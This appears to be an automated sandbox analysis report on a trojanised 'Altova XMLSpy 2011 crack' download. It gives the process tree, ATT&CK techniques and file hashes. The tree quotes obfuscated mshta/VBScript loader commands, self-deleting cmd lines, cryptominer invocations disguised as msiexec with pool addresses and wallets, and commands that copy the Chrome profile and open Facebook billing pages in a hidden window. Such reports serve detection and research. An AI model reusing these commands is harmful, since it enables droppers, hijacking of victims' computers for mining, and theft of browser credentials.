                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1656,7692139490278690910,1487552251458686611,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2212 /prefetch:2
                                                                                                                              2⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:4228
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                            1⤵
                                                                                                                              PID:1416
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                              1⤵
                                                                                                                                PID:1340
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                1⤵
                                                                                                                                  PID:1152
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                  1⤵
                                                                                                                                    PID:1036
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:336
                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3588
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:2784
                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:4324
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp2_Altova.Xmlspy.2011.Enterprise.crack.zip\Altova.Xmlspy.2011.Enterprise.crack.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp2_Altova.Xmlspy.2011.Enterprise.crack.zip\Altova.Xmlspy.2011.Enterprise.crack.exe"
                                                                                                                                        1⤵
                                                                                                                                          PID:3136
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                            2⤵
                                                                                                                                              PID:2152
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                keygen-pr.exe -p83fsase3Ge
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3876
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:5092
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4940
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                keygen-step-1.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4872
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                keygen-step-5.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4104
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" vBSCRIPt: ClosE ( cREaTEOBJEcT ( "wsCRIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /Q /c tYPe ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn& iF """" == """" for %b IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~NXb"" /F > NUl " , 0 ) )
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4356
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe" /Q /c tYPe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" >D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn&iF "" == "" for %b IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~NXb" /F > NUl
                                                                                                                                                      5⤵
                                                                                                                                                        PID:3556
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe
                                                                                                                                                          D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4292
                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            "C:\Windows\System32\mshta.exe" vBSCRIPt: ClosE ( cREaTEOBJEcT ( "wsCRIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /Q /c tYPe ""C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe"" > D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn& iF ""/pnPuKn3KQlE3bNFqBn"" == """" for %b IN ( ""C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe"" ) do taskkill -IM ""%~NXb"" /F > NUl " , 0 ) )
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5036
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\system32\cmd.exe" /Q /c tYPe "C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe" >D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn&iF "/pnPuKn3KQlE3bNFqBn" == "" for %b IN ( "C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe" ) do taskkill -IM "%~NXb" /F > NUl
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:4684
                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                "C:\Windows\System32\regsvr32.exe" -u BZLY.W /s
                                                                                                                                                                7⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                PID:3172
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill -IM "keygen-step-5.exe" /F
                                                                                                                                                              6⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:3652
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                        keygen-step-2.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        PID:4984
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\EBF7.tmp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\EBF7.tmp.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:2912
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\EBF7.tmp.exe"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:3928
                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                                                                6⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:4664
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3332
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 127.0.0.1
                                                                                                                                                                5⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:3476
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                            keygen-step-4.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4528
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\asdw.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\asdw.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:4432
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                5⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5112
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:4624
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\F59C.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\F59C.tmp.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:4532
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\F59C.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\F59C.tmp.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:4288
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\F9A4.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\F9A4.tmp.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4648
                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w13180 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                  PID:4280
                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w11746@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:2196
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:752
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:4592
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                  • Drops Chrome extension
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:4648
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:1076
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:2196
                                                                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                      xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      PID:4260
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      PID:384
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff85b804f50,0x7ff85b804f60,0x7ff85b804f70
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:4640
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,13525726544855166345,11602776007353819289,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1700 /prefetch:8
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:4792
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,13525726544855166345,11602776007353819289,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2232 /prefetch:8
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:4684
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,13525726544855166345,11602776007353819289,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1652 /prefetch:2
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:3476
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13525726544855166345,11602776007353819289,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2756 /prefetch:1
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:4532
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13525726544855166345,11602776007353819289,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:5020
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13525726544855166345,11602776007353819289,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2916 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:1240
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13525726544855166345,11602776007353819289,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:4948
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13525726544855166345,11602776007353819289,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:2576
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13525726544855166345,11602776007353819289,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:1008
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      PID:3564
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:3188
                                                                                                                                                                                      • C:\ProgramData\2276140.exe
                                                                                                                                                                                        "C:\ProgramData\2276140.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:2808
                                                                                                                                                                                      • C:\ProgramData\7857356.exe
                                                                                                                                                                                        "C:\ProgramData\7857356.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        PID:4000
                                                                                                                                                                                        • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                          "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:4544
                                                                                                                                                                                      • C:\ProgramData\3052963.exe
                                                                                                                                                                                        "C:\ProgramData\3052963.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        PID:2748
                                                                                                                                                                                        • C:\ProgramData\3052963.exe
                                                                                                                                                                                          "{path}"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:940
                                                                                                                                                                                      • C:\ProgramData\170606.exe
                                                                                                                                                                                        "C:\ProgramData\170606.exe"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:4236
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                      PID:3200
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4120
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:944
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:3884
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:4940
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                                                    keygen-step-3.exe
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4972
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3660
                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                          ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                          PID:8

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                Persistence

                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                1
                                                                                                                                                                                T1060

                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                Modify Registry

                                                                                                                                                                                2
                                                                                                                                                                                T1112

                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                1
                                                                                                                                                                                T1130

                                                                                                                                                                                Credential Access

                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                5
                                                                                                                                                                                T1081

                                                                                                                                                                                Discovery

                                                                                                                                                                                Query Registry

                                                                                                                                                                                3
                                                                                                                                                                                T1012

                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                4
                                                                                                                                                                                T1082

                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                1
                                                                                                                                                                                T1018

                                                                                                                                                                                Collection

                                                                                                                                                                                Data from Local System

                                                                                                                                                                                5
                                                                                                                                                                                T1005

                                                                                                                                                                                Command and Control

                                                                                                                                                                                Web Service

                                                                                                                                                                                1
                                                                                                                                                                                T1102

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                  MD5

                                                                                                                                                                                  77188fd4c10607047c46183d15ece341

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6f0d0a6e79edd606394db6e73eb466486552c785

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  cfcf6e4cf4134fa5a620b31e8706491b527cffd29da6f8068c2b440a18e829cd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  2e5f3e2186b2aafb83b43438d7076167f732d7e7df65cba1f7dac693c2f7b9db857b9692eb60ae1d018d8edaead4ffe9e3194a11cfb9cee114437c3c659c8791

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                  MD5

                                                                                                                                                                                  39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                • \??\pipe\crashpad_2112_ESRGYUZQSPFJVDOT
                                                                                                                                                                                  MD5

                                                                                                                                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                  SHA256

